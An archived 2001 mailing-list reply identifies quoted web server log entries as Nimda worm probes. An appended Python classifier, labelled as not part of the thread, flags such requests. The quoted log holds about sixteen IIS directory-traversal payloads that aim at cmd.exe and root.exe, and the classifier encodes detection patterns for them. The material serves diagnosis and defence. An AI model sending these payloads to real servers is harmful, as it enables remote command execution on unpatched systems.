Re: [SLUG] WHAT is THIS?

From: Andrew Wyatt (awyatt@intergate.cx)
Date: Tue Oct 02 2001 - 06:24:37 EDT


Ahhh, that is the good ol' Nimda footprint.

Andrew

On Monday 01 October 2001 10:33 pm, you wrote:
> Snipped from my httpd log file: The log file is littered with them from
> IPs that appear to be all over the world. Any ideas? I am thankful I am
> running Linux, which would account for 404 errors.
>
> 24.95.6.159 - - [01/Oct/2001:22:05:23 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 293
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 291
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 301
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:37 -0400] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 332
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 348
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
> 24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315

-- 
cat MCSE | sed s/MCSE/RHCE/g>MCSE && kill -9 `ps -ef | grep MSFT | awk 
'{print $2}'` && mail -s "Another one bites the dust" bill.gates@microsoft.com

-----BEGIN GEEK CODE BLOCK----- Version: 3.1 GAT d+@ s+ a- C++++ ULBH++++$ P++++$ L++++$ E--- W+++ N+++ o+++ K- w---$ O M+ V- PS-- PE+ Y- PGP- t+++@ 5- X++ R* tv-- b++++ DI+++ D++ G++ e* h++ r+++ z** ------END GEEK CODE BLOCK------
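
Added example, not part of the original thread: a small Python classifier that labels access-log requests like the ones quoted above by the encoding tricks and target names they carry, so they can be separated from ordinary 404 noise. The trait names and the `classify`/`scan` helpers are this example's own, and the final sample line is constructed.

```python
import re
from urllib.parse import unquote_to_bytes

# Common Log Format: client ident user [time] "METHOD target PROTO" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) \S+$')
BAD_ESCAPE = re.compile(rb"%(?![0-9A-Fa-f]{2})")    # '%' not followed by two hex digits
LEAD_C0_C1 = re.compile(rb"([\xc0\xc1])(.)", re.S)  # lead bytes valid UTF-8 never uses

def _lenient(m):
    # Two-byte decode that masks the bits without validating either byte.
    return bytes([((m[1][0] & 0x1F) << 6) | (m[2][0] & 0x3F)])

def classify(target):
    """Return the set of probe traits present in one request target."""
    path = target.encode("latin-1").split(b"?", 1)[0]
    traits = set()
    if BAD_ESCAPE.search(path):
        traits.add("malformed-escape")
    decoded, passes = unquote_to_bytes(path), 1
    while unquote_to_bytes(decoded) != decoded:      # decode until nothing changes
        decoded, passes = unquote_to_bytes(decoded), passes + 1
    if passes > 1:
        traits.add("nested-encoding")
    if LEAD_C0_C1.search(decoded):
        traits.add("overlong-utf8")
    # Normalise both separators so one check covers "/" and "\" variants.
    flat = LEAD_C0_C1.sub(_lenient, decoded).replace(b"\\", b"/").lower()
    if b"../" in flat:
        traits.add("traversal")
    for name in (b"cmd.exe", b"root.exe"):
        if flat.endswith(b"/" + name):
            traits.add(name.decode())
    return traits

def scan(lines):
    """Return (client, status, sorted traits) for every line with at least one trait."""
    matches = (CLF.match(line.strip()) for line in lines)
    return [(m[1], int(m[3]), sorted(t)) for m in matches if m and (t := classify(m[2]))]

# First four entries: from the quoted log, mail wrapping undone. Last entry: constructed.
SAMPLE = [
    '24.95.6.159 - - [01/Oct/2001:22:05:23 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315',
    '24.95.175.59 - - [01/Oct/2001:22:24:36 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 293',
    '24.95.175.59 - - [01/Oct/2001:22:24:38 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 314',
    '24.95.175.59 - - [01/Oct/2001:22:24:39 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 298',
    '203.0.113.7 - - [01/Oct/2001:22:30:00 -0400] "GET /index.html HTTP/1.0" 200 1024',
]
```

`scan(SAMPLE)` returns four hits and skips the benign request. Because the status code is carried through, any flagged line with a 2xx response can be pulled out for follow-up.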



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 20:36:26 EDT